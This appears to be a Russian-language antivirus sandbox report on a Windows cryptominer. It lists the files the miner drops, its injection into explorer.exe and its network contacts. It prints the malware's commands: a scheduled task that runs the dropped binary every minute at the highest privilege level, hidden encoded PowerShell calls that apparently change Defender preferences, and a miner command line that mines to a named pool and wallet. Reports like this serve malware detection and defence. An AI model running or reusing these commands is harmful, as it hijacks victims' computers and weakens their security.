Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\runtime broker
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\runtime broker\runtime broker
- %TEMP%\winring0x64.sys
Сетевая активность
Подключается к
- 'pa###bin.com':443
- '12#.#5.231.32':80
- 'ht##bin.org':80
TCP
Запросы HTTP GET
- http://ht##bin.org/ip
Другие
- 'pa###bin.com':443
UDP
- DNS ASK pa###bin.com
- DNS ASK ht##bin.org
Другое
Создает и запускает на исполнение
- '%APPDATA%\runtime broker\runtime broker'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAG... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIA...
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "%APPDATA%\Runtime Broker\Runtime Broker"
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x (со скрытым окном)
